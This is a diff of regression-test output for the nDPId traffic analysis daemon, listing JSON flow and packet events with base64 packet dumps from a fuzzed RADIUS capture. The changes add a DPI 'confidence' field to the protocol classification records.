 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":10,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690}
 01554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1528996609526,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":876,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":876,"pkt_l4_len":842,"ts_msec":1528996609526,"pkt":"AAAMB6xAABRP+4rqCABFAANeIMtAAP8RAAAKDEAexuIZNXIQBxUDSgAABA8DQohFBlHb2YvdG6PaZMpxlt8aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwATUwMzExFDgwMjUwODY0NjI4QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmd+CDFjYXNjbwUGAAAACAQGrBQBEAgGrBQBFWEUAED+gAAAAAAAAAAAAAAAAAAAGYhTQlIyQ0zl2aywoICAgICAEYBzAYAUgZ6M7PeDwdzlup3t95Os3O+5mefgAoA7gZiM5pOJ0PCwmaemg8HY6LaZjoiHu7HC7pebreaZ0PCwl5ustpnM4rGXjOz3g8Hc5bqd7feTrNzvuZngEoAOgeXZrLCi7MWgzYCAgICgFZAGgIzA6rWCjCAOVlpXQzJUZXN0TGFiGgwAADdjAQYAAAACLCI1YjIyYTBmZS8wMDo1NjpjZDo2ZDo0Mjo1OS8yMDc9BgAAABMaMQAAAAkBK2F1ZGl0LXNlc3Npb24taWQ9MTBmZjEwYWMwMDAwMDBiM2ZlYTAyMjViLQYAAAABQAYAAAANQQYAAAAGUQQ1Njeqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
 00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1528996609592,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"ts_msec":1528996609592,"pkt":"ABRP+4rqcNuYVcUnCABFAACFyc1AAPwRiljG4hk1CgxAHgcVchAAcZmUBQ8AaTuYG1n4ee1Aq0+zAcDNdlwBNTAzMTE0ODAyNTA4NjQ2MjhAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3Jrqm9yZywgNWIyMmEwZmUvMDA6NTY6Y2Q6NmQ6NDI6NTkvMjA3"}
-00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":13,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1528996520912,"flow_last_seen":1528996521508,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":236,"midstream":0,"ts_msec":1528996636106,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":13,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1528996520912,"flow_last_seen":1528996521508,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":236,"midstream":0,"ts_msec":1528996636106,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":13,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996521324,"flow_last_seen":1528996521324,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528996636106,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1796,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01290{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":13,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":34816,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"ts_msec":1528996636106,"pkt":"AAAMB6xAABRP+4rqiABFAALbIMxAAP8RAAAKDEAexuIZNXIQBxQCxwAAARACv7qQ3oRQOi6G4UsAlSEouDAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwdbIqIcATUwMzExNDgwMDczNjM4MDcyQXdsYW4ubW5jNDgwLm1jYzMxMS4zZ3FwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtM7ceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDA4YjYxY2EzMjI1YiwgNWIyMmEzMWM\/ZjA6Nzk6NjA6ZDE6N2Q6MzcvMjExBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAMzIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFSUAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNHY4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjYRoMAAAFgwcGwFBKmVASAmScZx+R57CcOV54IGggHQ=="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":13,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":34816}
@@ -44,16 +44,16 @@
 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1528996680808,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1528996680808,"pkt":"ABRP+4rqcNuYVcUnCABFAADA98dAAPwRXCPG4qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996684582,"flow_last_seen":1528996684582,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528996684582,"l3_proto":"ip4","src_ip":"10.4.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1528996684582,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528996684582,"pkt":"AAAMB6xAJQBP+4r3CABFAALbINFAAP8RAAAKBEAexuIZNXIQBxQCxwAAARUCv2qbhqMMM0mMg0ptdOqiEGYaCgAAV8gOBFVTGgwAAFPIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM4NwZbIqNMATUwMzExNDgwMjc4NTAxMDA5QHdsYW4ubW5jNKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996684582,"flow_last_seen":1528996684582,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528996684582,"l3_proto":"ip4","src_ip":"10.4.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996684582,"flow_last_seen":1528996684582,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528996684582,"l3_proto":"ip4","src_ip":"10.4.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528996689402,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1528996689402,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1528996689402,"pkt":"ABRP+4rqcNuYVcUnCABFAAClbuVAAPwRXCDG4hk1CgxAHgcUclYAkWdmCxcAiQrIitkB1LgR0s5zEPVzzzIBNTAzMTE0dzAyNzg1MDEwMDlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEzNDgvNjQ6YjA6YTY6MGU6YTQ6ZWMvMjEyTw4BAAAMFwwAAHYBf\/xQEjLibctMfYgZSgHqxKHsV1U="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528996689402,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528996689402,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00568{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":30,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"ts_msec":1528996689587,"pkt":"ABRP+4rqcNuYVcUnCABFAADA9+klAPwRXAHG4hk1CgxAHgcUchAArPtqAxgApNkk5fehx32PqouJEXUDfwgBNTAzMTE0ODAyNzg1MDEwMDlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEzNDkvNjQ6YjA6YU06uGU6YTQ6ZWMvMjEyeCIzMjc2NCBTdWJzY3JpYmVyIG5vdCBwcm92aXNpb25lZE8lAAEABwBQEslNLvLV5rc9WbdNXraRxZQ="}
 00200{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":30,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172}
 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":31,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996521324,"flow_last_seen":1528996521324,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528996733086,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1796,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996521324,"flow_last_seen":1528996521324,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528996733086,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1796,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":31,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1528996520912,"flow_last_seen":1528996689524,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":4479,"flow_avg_l4_payload_len":407,"midstream":0,"ts_msec":1528996733086,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":31,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1528996603395,"flow_last_seen":1528996609592,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":834,"flow_tot_l4_payload_len":1642,"flow_avg_l4_payload_len":547,"midstream":0,"ts_msec":1528996733086,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":31,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1528996520912,"flow_last_seen":1528996689524,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":4479,"flow_avg_l4_payload_len":407,"midstream":0,"ts_msec":1528996733086,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":31,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1528996603395,"flow_last_seen":1528996609592,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":834,"flow_tot_l4_payload_len":1642,"flow_avg_l4_payload_len":547,"midstream":0,"ts_msec":1528996733086,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00590{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":31,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996641548,"flow_last_seen":1528996641548,"flow_idle_time":180000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1528996733086,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":30764,"dst_port":12344,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996733156,"flow_last_seen":1528996733156,"flow_idle_time":180000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1528996733156,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":309,"dst_port":12339,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00630{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1528996733156,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":179,"pkt_l4_len":117,"ts_msec":1528996733156,"pkt":"ABRP+4rqcNuYVcUnCABMBACl+GRAAPwRW6HG4hk1CgxAHgcUchAAkfvBCxkAidYnQnH6\/q3z6sD9\/UzPvYgBNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEzN2MvYjA6OWY6YmE6NGE6MGU6N2UvMjEzTw4BAAAxFwwAAAwBf\/xQEj4NW9JYKjnp+Qug4VR6j6U="}
@@ -61,34 +61,34 @@
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":35,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2050}
 00569{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":38,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"ts_msec":1528996736804,"pkt":"ABRP+4rqcNuYVcUnCABFAADA+HNBAPwRW3fG4hk1CgxAHgcUchAArIw9AxwApBZ8i1l5y5I6R7UN7fbGLQ0BNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLhNncHBuZXR3b3JrLm9yZywgNWIyMmEzN2PpYjA6OWY6YmE6NGE6MGU6N2UvMjEzEiIzMjc2NCBTdWJzY3JpYmVyJWlvdCBwcm92aXNpb25lZE8HBAEABwBQEhu6bMXdvKMo\/pphwZK5oRM="}
 00200{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":38,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1528996603395,"flow_last_seen":1528996609592,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":834,"flow_tot_l4_payload_len":1642,"flow_avg_l4_payload_len":547,"midstream":0,"ts_msec":1528996825583,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1528996603395,"flow_last_seen":1528996609592,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":834,"flow_tot_l4_payload_len":1642,"flow_avg_l4_payload_len":547,"midstream":0,"ts_msec":1528996825583,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996641548,"flow_last_seen":1528996641548,"flow_idle_time":180000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1528996825583,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":30764,"dst_port":12344,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996641548,"flow_last_seen":1528996641548,"flow_idle_time":180000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1528996825583,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":30764,"dst_port":12344,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1528996520912,"flow_last_seen":1528996740339,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":8452,"flow_avg_l4_payload_len":422,"midstream":0,"ts_msec":1528996825583,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996684582,"flow_last_seen":1528996684582,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528996825583,"l3_proto":"ip4","src_ip":"10.4.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
